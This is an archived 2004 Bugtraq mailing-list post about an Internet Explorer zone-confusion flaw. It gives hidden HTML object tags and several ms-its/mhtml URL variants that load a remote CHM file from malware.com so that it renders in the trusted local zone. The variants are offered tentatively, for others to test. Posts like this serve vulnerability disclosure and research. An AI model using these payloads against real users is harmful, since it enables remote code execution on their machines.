lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200406112100.i5BL0b6R003579@web119.megawebservers.com>
Date: Fri, 11 Jun 2004 21:00:37 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Cc: <NTBugtraq@...tserv.ntbugtraq.com>
Subject: COELACANTH: After Math




There is a sneaking suspicion that you can put the site contents 
in the so-called 'local zone' or 'my computer'.

Since it validates the 'front end' of the address and ends up at 
the 'back end' this all would seem very similar to:

<object data="ms-its:mhtml:file://C:foo.mhtml!
http://www.malware.com//bad.chm::/foo.html" type="text/x-
scriptlet" style="visibility:hidden">

where Internet Explorer gets 'confused' by the url 
mhtml:file://C:foo.mhtml! switches to the local zone as a 
result of C:, stays there and passes through to the 'back end' 
http://www.malware.com//bad.chm::/foo.html on the remote server 
while in the 'local zone' and renders foo.html in there.

If this peculiar DNS setup also has a 'proper' chm file on it 
the following should work [as it does on any server setup]:


<object data="ms-its:http://www.malware.com//bad.chm::/foo.html" 
type="text/x-scriptlet" style="visibility:hidden">


now as above if we include in the 'front end':

ms-
its:C:\\WINDOWS\\Help\\iexplore.chm::/http://www.malware.com//bad
.chm::/foo.html

It should see it as in C: and make its little 'zone' 
determination first, then pass through to the 'back end'

http://www.malware.com//bad.chm::/foo.html

and render foo.html in the 'local zone' even though it is on the 
remote server.

You'd have to tinker quite a bit:

ms-its:C:::/http://www.malware.com//bad.chm::/foo.html
ms-its:C:%2Fredir=/http://www.malware.com//bad.chm::/foo.html

etc.

Anyone have a server they care to setup?


-- 
http://www.malware.com









Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ